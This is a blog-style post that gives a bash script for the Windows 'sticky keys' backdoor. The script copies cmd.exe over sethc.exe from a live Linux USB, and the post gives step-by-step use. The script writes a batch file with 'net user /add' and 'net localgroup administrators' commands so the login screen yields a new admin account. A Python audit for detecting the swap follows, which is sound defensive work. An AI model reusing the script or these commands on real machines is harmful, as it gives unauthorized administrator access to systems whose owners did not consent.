A quick little script for using the sethc.exe patch under Windows OS.
------------sethcpatch.sh v3 start--------------
#! /bin/bash
# cmd.exe --> sethc.exe copy patch
# Target: Windows XP - 10, Windows Server 2000, 2003, 2008. Not tested on Server 2016.
# Version 0.3 - January 2020
# By nx
HELP()
{
    echo "Run with patchwin / unpatchwin"
}

PATCH_WIN()
{
    echo "patching windows sethc function...."
    sleep 2
    mkdir patch
    cp sethc.exe patch/sethc.bak
    cp cmd.exe patch/cmd.bak
    rm sethc.exe
    cp cmd.exe sethc.exe
    echo "patching done ......"
    sleep 2
    echo "Writing windows bat file..."
    cd patch
    touch useradd.bat
    echo "net user /add user password" > useradd.bat
    echo "net localgroup administrators user /add" >> useradd.bat
    cd ..
    sleep 2
    echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
    echo "Run with useradd.bat"
    sleep 2
}

UNPATCH_WIN()
{
    echo "unpatch Windows sethc.exe"
    sleep 2
    rm sethc.exe
    rm cmd.exe
    cd patch
    cp sethc.bak ../sethc.exe
    cp cmd.bak ../cmd.exe
    cd ..
    rm -rf patch
    sleep 2
    echo "Done cleaning up !"
    echo "sethc.exe & cmd.exe reset to original..."
    echo "Script terminating... "
}

case "$1" in
    help) HELP
    ;;
    patchwin) PATCH_WIN
    ;;
    unpatchwin) UNPATCH_WIN
    ;;
    *) HELP
    ;;
esac
exit 0
-----------------sethcpatch.sh v3 end------------------
So, add it to a live distro image, under /root/live-build-config/variant-X/includes.chroot/
Make a folder, e.g. /opt/tools/local/win, drop the script there, and remember to chmod +x it.
And what to do next? Boot a Windows machine from the live USB and run the script to patch the Windows machine. Remember to change the script to your own user name and password before including it in a live distro.
When the patch has been run, shut down the live Kali, boot into Windows, press Shift five times at the login prompt, run useradd.bat, and enjoy your new admin privs :)
NOTE: This won't work if BIOS / UEFI access is password protected, or if the disk itself is encrypted. You will need read / write access to the Windows partition from Kali Linux. It's not a wonder cure or a crack in any way; it's just a simple helper script for doing something you could do by hand. Gaining access by exploits, remote or local, is for another article :)
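From the defender's side, the swap is easy to spot on disk: after patchwin, sethc.exe is a byte-for-byte copy of cmd.exe, and the script leaves a patch\ folder in System32 holding sethc.bak, cmd.bak and useradd.bat. The audit below is an added example, not part of the original post or script; it hashes the two binaries and looks for those leftovers. Point it at a real System32 directory (mounted from Linux, or C:\Windows\System32 on the host itself); the fake System32 it builds when run without arguments, and the "MZ..." stand-in file contents, are constructed for the demo and are not real binaries.

```python
"""Audit a Windows System32 directory for the cmd.exe -> sethc.exe swap.

Added example (not from the original post). Findings:
  swapped   - sethc.exe has the same SHA-256 as cmd.exe
  leftovers - backup/bat files sethcpatch.sh leaves in System32\\patch
  missing   - expected binaries not present (audit could not hash them)
"""
import hashlib
import sys
import tempfile
from pathlib import Path

# Artifacts that sethcpatch.sh writes next to the swapped binaries.
LEFTOVERS = ("patch/sethc.bak", "patch/cmd.bak", "patch/useradd.bat")


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 (binaries can be several MB)."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_system32(system32: Path) -> dict:
    """Return findings for one System32 directory."""
    findings = {"swapped": False, "leftovers": [], "missing": []}
    sethc = system32 / "sethc.exe"
    cmd = system32 / "cmd.exe"
    for p in (sethc, cmd):
        if not p.is_file():
            findings["missing"].append(p.name)
    # On a clean install the accessibility binary and the shell differ;
    # identical content means one was copied over the other.
    if not findings["missing"]:
        findings["swapped"] = sha256_of(sethc) == sha256_of(cmd)
    for rel in LEFTOVERS:
        if (system32 / rel).exists():
            findings["leftovers"].append(rel)
    return findings


def is_suspicious(findings: dict) -> bool:
    return bool(findings["swapped"] or findings["leftovers"])


def build_demo_system32(patched: bool) -> Path:
    """Construct a throwaway fake System32 so the audit runs offline.

    The file contents are constructed stand-ins, not real PE binaries.
    """
    root = Path(tempfile.mkdtemp(prefix="fake_system32_"))
    cmd_bytes = b"MZ...constructed cmd.exe stand-in..."
    sethc_bytes = b"MZ...constructed sethc.exe stand-in..."
    (root / "cmd.exe").write_bytes(cmd_bytes)
    if patched:
        # State after patchwin: cmd.exe copied over sethc.exe, originals in patch/
        (root / "sethc.exe").write_bytes(cmd_bytes)
        (root / "patch").mkdir()
        (root / "patch" / "sethc.bak").write_bytes(sethc_bytes)
        (root / "patch" / "cmd.bak").write_bytes(cmd_bytes)
        (root / "patch" / "useradd.bat").write_text("rem constructed stand-in\n")
    else:
        (root / "sethc.exe").write_bytes(sethc_bytes)
    return root


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_demo_system32(patched=True)
    result = audit_system32(target)
    verdict = "SUSPICIOUS" if is_suspicious(result) else "clean"
    print(f"{target}: {verdict} {result}")
```

Run it as `python audit_sethc.py /mnt/win/Windows/System32` from a forensic boot, or against C:\Windows\System32 on the running host. Note that unpatchwin restores both binaries and deletes the patch\ folder, so after a clean-up this check finds nothing; at that point the evidence is the new local administrator account and the Windows event log entries from its creation, not the files on disk.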